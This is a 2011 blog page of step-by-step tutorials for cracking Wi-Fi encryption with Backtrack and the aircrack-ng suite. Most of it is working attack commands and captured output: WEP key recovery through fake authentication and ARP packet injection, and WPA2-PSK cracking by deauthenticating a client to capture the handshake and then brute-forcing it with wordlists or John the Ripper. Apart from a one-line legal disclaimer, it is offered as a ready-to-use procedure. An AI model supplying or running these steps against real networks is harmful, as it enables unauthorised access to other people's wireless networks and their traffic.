Info Tech Articles: wep cracking

Thursday, 27 October 2011

Wep Cracking

A. SCOPE

This tutorial is intended for user’s with little or no experience with linux or wifi. This tutorial aims to guide you through the process of using it effectively.

B. OVERVIEW

BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview

Kismet – a wireless network detector and packet sniffer
airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
aireplay – a tool for forging ARP requests
aircrack – a tool for decrypting WEP keys
iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms

AP: Access Point: a wireless router
MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
BSSID: Access Point’s MAC address
ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.

C. DISCLAIMER
Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.

STEP 1 :
Monitoring Wireless Traffic With Kismet ( for putting wlan in moniter mode)
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet.
Specify Wireless Interface e-g. waln0
Note in text editor:
broadcast name(essid), also called SSID, in our its ITMIS
mac address(bssid), this is mac of radio interface of AP
channel number
Leave kismet running to leave your wireless adapter in monitor mode.

STEP 2
Collecting Data With Airodump
airodump-ng wlan0 –ivs -w /root/Desktop/ITMIS_RCU

STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e ITMIS -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0
a- Mac of AP
h- Mac of wlan0(laptop)

STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 waln0

STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2. Then type in a terminal:
aircrack-ng -s /root/Desktop/ITMIS_RCU.ivs

Sunday, 23 October 2011

WEP / WPA Cracking Unleashed (wifi cracking)

Cheatsheet : Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper

Basic steps :

Put interface in monitor mode
Find wireless network (protected with WPA2 and a Pre Shared Key)
Capture all packets
Wait until you see a client and deauthenticate the client, so the handshake can be captured
Crack the key using a dictionary file (or via John The Ripper)

I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

First, put the card in monitor mode :

root@bt:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

Ok, we can now use interface mon0

Let’s find a wireless network that uses WPA2 / PSK :

root@bt:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Stop airodump-ng and run it again, writing all packets to disk :

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3

mon0

13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Stop airodump-ng and make sure the files were created properly

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc….

Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time

The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the

.cap fie that contains the WPA2 Handshake.

So if your wordlist is called word.lst (under /tmp/wordlists), you can run

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

(Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.

That’s it

Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts :

8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit.

WEP Cracking

1. Ifconfig wlan0 up

2. airmon-ng start wlan0

3. airodump-ng mon0 (to check for the AP and Station and to choose the desired one)

4. airodump-ng start --channel (e.g 11) –b (MAC of AP) -w (path for dump to save with filename)

5. aireplay-ng -3 -b (MAC of AP) -h (MAC of Station) mon0 (to increase traffic)

6. aircrack-ng -b (MAC of AP) (path of dump files with *.cap)

DONE!